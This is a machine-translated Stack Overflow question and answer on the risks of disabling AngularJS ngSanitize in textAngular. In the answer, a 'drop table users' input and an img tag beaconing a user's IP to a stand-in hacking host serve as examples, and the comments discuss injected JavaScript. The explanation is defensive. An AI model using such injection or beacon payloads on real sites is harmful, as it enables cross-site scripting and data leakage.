0
允許用戶生成unsanitized html的風險是什麼?我使用的文本角度和要使用:什麼是禁用ngSanitize的風險?
ta-unsafe-sanitizer="true"
https://github.com/fraywing/textAngular/issues/233
現在 - 我想象中的人讀這不知道是什麼文字角是99.9%,所以我主要感興趣的允許原始html的整體結果。
A
回答
1
假設您有一個帶有輸入的表單元素,並且用戶插入輸入類似drop table users。如果您的服務器代碼較弱或某些服務不知道它的安全級別,可能會丟失數據。 現在,這是一個例子。有許多方法可以用類似的方式做壞事。
其他例子是插入到圖片src一些網址查詢paramters像
<img
src='http://somehackingsite.com/images/lol.png?userIp="some scriptor other hacking style"' />
AngularJs通過剝離所有潛在的危險 提供了一種通過ngSanitize
解決它進行消毒HTML字符串令牌。
輸入通過將HTML解析爲令牌來消毒。所有安全 令牌(來自白名單)然後被序列化爲正確轉義的 html字符串。這意味着沒有不安全的輸入可以使其進入 返回的字符串。
屬性值的URL消毒白名單被配置 使用函數aHrefSanitizationWhitelist和 imgSrcSanitizationWhitelist $ compileProvider的。
相關問題
- 1. 禁用TCP nagle行爲的風險是什麼?
- 2. Emacs中的「風險」是什麼?
- 3. 風險分析與風險緩解有什麼區別?
- 4. 使用xpath有什麼安全風險?
- 5. 使用Macports有什麼風險?
- 6. 使用AF_UNSPEC的缺點/風險是什麼?
- 7. 你有什麼風險管理策略?
- 8. UnsafeMutablePointer <UInt8>:有什麼風險?
- 9. 多次SubmitChanges有什麼風險?
- 10. 在GTM的dataLayer中暴露PII信息的風險是什麼?
- 11. lambda表達式序列化中的安全風險是什麼?
- 12. 什麼是分析項目風險的最佳方式?
- 13. /var/run/docker.sock的Docker安全風險是什麼?
- 14. 設置Access-Control-Allow-Origin的安全風險是什麼?
- 15. 大型C++文件的風險是什麼?
- 16. 跨域JSONP通信的風險是什麼?
- 17. 在SQL中增加列大小的潛在風險是什麼?
- 18. 使用稀疏列而不是普通關係表的風險是什麼?
- 19. 風險
- 20. 風險
- 21. 什麼是... mysql_real_escape_string?危險嗎?
- 22. 初始化變量 - 爲什麼以及有什麼風險?
- 23. 風險的mod_proxy
- 24. AHAH是安全風險嗎?
- 25. 爲什麼使用'*'作爲postMessage的targetOrigin存在安全風險?
- 26. 使用提取的PHP超全球植物有什麼風險?
- 27. 我是否有POST風險的CSRF攻擊風險,不需要用戶登錄?
- 28. 在Android平臺上使用棄用方法有什麼風險?
- 29. 使用單個美元符號'$`作爲java類名稱的風險是什麼?
- 30. 呈現用戶輸入Django模板的安全風險是什麼?
這取決於你在用這些數據做什麼。你有沒有把它展示給其他用戶? – JJJ
它用於生成報告。其他用戶可以看到組織管理員生成的報告。構建這些報告的人是組織管理員。例如,它會成爲一名經理看多個辦公室。我不在乎他們讓用戶看到什麼,只要它不能讓他們訪問受限制的後端元素,這是我無法想象的。 – VSO
不,但如果其他用戶看到它,可能會有經理插入惡意JavaScript。當然,這不一定要自願完成,而是以某種方式由某種病毒或攻擊者完成。基本上任何可能出錯的東西,如果隨意的JavaScript被包含到用戶瀏覽器中_理論上會出錯。 – dirkk